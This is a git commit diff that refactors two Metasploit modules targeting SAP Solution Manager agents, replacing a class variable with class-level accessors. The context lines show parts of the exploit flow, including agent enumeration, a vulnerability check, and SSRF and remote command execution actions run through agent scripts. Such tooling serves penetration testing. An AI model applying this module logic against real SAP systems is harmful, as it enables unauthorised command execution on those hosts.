Replace class var @@agents with a class instance var in auxiliary and exploit modules.

2021-03-22 12:13:04 +03:00
parent 6e13a26fd3
commit 2a48dd265d
2 changed files with 42 additions and 24 deletions
@@ -10,6 +10,8 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Metasploit::Framework::SapSolutionManager::Client

+  @agents = Array.new # Array of connected agents
+
  def initialize(info = {})
    super(
      update_info(
@@ -57,7 +59,15 @@ class MetasploitModule < Msf::Auxiliary
        OptString.new('AGENT', [false, 'Agent server name for exec command or SSRF', 'agent_server_name']),
      ]
    )
-    @@agents = Array.new # Array of connected agents
+    self.class.agents = Array.new
+  end
+
+  class << self
+    attr_reader :agents
+  end
+
+  class << self
+    attr_writer :agents
  end

  def setup_xml_and_variables
@@ -123,12 +133,12 @@ class MetasploitModule < Msf::Auxiliary

  # Check current agent in agents list
  def check_agent(agent_name)
-    if @@agents.empty?
+    if self.class.agents.empty?
      fail_with(Failure::NoTarget, 'Available agents not found, please make agents list: `set action LIST; run`')
    elsif agent_name.nil?
-      fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{@@agents[0]['serverName']}`")
+      fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{self.class.agents[0]['serverName']}`")
    else
-      @@agents.each do |agent|
+      self.class.agents.each do |agent|
        if agent_name == agent[:serverName]
          return true
        end
@@ -152,31 +162,31 @@ class MetasploitModule < Msf::Auxiliary

  def action_list
    # Clear agents array if that array is not empty
-    unless @@agents.empty?
-      @@agents.clear
+    unless self.class.agents.empty?
+      self.class.agents.clear
    end
    setup_xml_and_variables

    begin
      print_status("Getting a list of agents connected to the Solution Manager: #{@host}")
-      @@agents = make_agents_array(@path)
+      self.class.agents = make_agents_array(@path)
    rescue RuntimeError => e
      print_error("Failed to make the list of connected agents on the SAP Solution Manager page at #{@solman_uri}")
      vprint_error("Error #{e.class}: #{e}")
      analyze_error(e.message)
    end
    report_service_and_vuln
-    if @@agents.empty?
+    if self.class.agents.empty?
      print_good("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents connected!")
    else
-      print_good("Connected agents list: \n#{pretty_agents_table(@@agents)}")
+      print_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}")
    end
  end

  def action_ssrf
    setup_xml_and_variables
    unless check_agent(@agent_name)
-      fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}")
+      fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}")
    end
    begin
      vprint_status("Enable EEM on agent: #{@agent_name}")
@@ -190,7 +200,6 @@ class MetasploitModule < Msf::Auxiliary

      vprint_status("Delete script: #{@script_name} on agent: #{@agent_name}")
      delete_script_in_agent(@agent_name, @script_name, @path)
-
    rescue RuntimeError => e
      print_error("Failed to send SSRF: '#{@ssrf_method} #{@ssrf_uri} HTTP/1.1' from agent: #{@agent_name}")
      vprint_error("Error #{e.class}: #{e}")
@@ -203,7 +212,7 @@ class MetasploitModule < Msf::Auxiliary
  def action_exec
    setup_xml_and_variables
    unless check_agent(@agent_name)
-      fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}")
+      fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}")
    end
    begin
      vprint_status("Enable EEM on agent: #{@agent_name}")
@@ -217,7 +226,6 @@ class MetasploitModule < Msf::Auxiliary

      vprint_status("Delete script: #{@script_name} on agent: #{@agent_name}")
      delete_script_in_agent(@agent_name, @script_name, @path)
-
    rescue RuntimeError => e
      print_error("Failed to execution command: '#{@rce_command}' on agent: #{@agent_name}")
      vprint_error("Error #{e.class}: #{e}")
@@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
  include Metasploit::Framework::SapSolutionManager::Client

+  @agents = Array.new # Array of connected agents
+
  def initialize(info = {})
    super(
      update_info(
@@ -58,7 +60,15 @@ class MetasploitModule < Msf::Exploit::Remote
        OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
      ]
    )
-    @@agents = Array.new # Array of connected agents
+    self.class.agents = Array.new
+  end
+
+  class << self
+    attr_reader :agents
+  end
+
+  class << self
+    attr_writer :agents
  end

  def setup_variables
@@ -119,11 +129,11 @@ class MetasploitModule < Msf::Exploit::Remote

  # Check current agent in agents list
  def check_agent(agent_name)
-    if @@agents.empty?
+    if self.class.agents.empty?
      begin
        print_status("Getting a list of agents connected to the Solution Manager: #{@host}")
-        @@agents = make_agents_array(@path)
-        vprint_good("Connected agents list: \n#{pretty_agents_table(@@agents)}")
+        self.class.agents = make_agents_array(@path)
+        vprint_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}")
      rescue RuntimeError => e
        print_error("Failed to make the list of connected agents on the SAP Solution Manager page at #{@solman_uri}")
        vprint_error("Error #{e.class}: #{e}")
@@ -132,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    if agent_name.nil?
-      fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{@@agents[0]['serverName']}`")
+      fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{self.class.agents[0]['serverName']}`")
    end

-    @@agents.each do |agent|
+    self.class.agents.each do |agent|
      if agent_name == agent[:serverName]
        return true
      end
@@ -160,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote

  # Get agent OS by agent server name
  def get_agent_os(agent_name)
-    @@agents.each do |agent|
+    self.class.agents.each do |agent|
      if agent_name == agent[:serverName]
        return agent[:osName]
      end
@@ -171,14 +181,14 @@ class MetasploitModule < Msf::Exploit::Remote
  def check
    setup_variables
    begin
-      @@agents = make_agents_array(@path)
+      self.class.agents = make_agents_array(@path)
    rescue RuntimeError
      return Exploit::CheckCode::Safe
    end
-    if @@agents.empty?
+    if self.class.agents.empty?
      print_status("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents connected!")
    else
-      print_good("Connected agents list: \n#{pretty_agents_table(@@agents)}")
+      print_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}")
    end
    report_service_and_vuln
    Exploit::CheckCode::Vulnerable
@@ -187,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit
    setup_variables
    unless check_agent(@agent_name)
-      fail_with(Failure::BadConfig, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}")
+      fail_with(Failure::BadConfig, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}")
    end
    report_service_and_vuln
    agent_os = get_agent_os(@agent_name) || 'Unknown OS'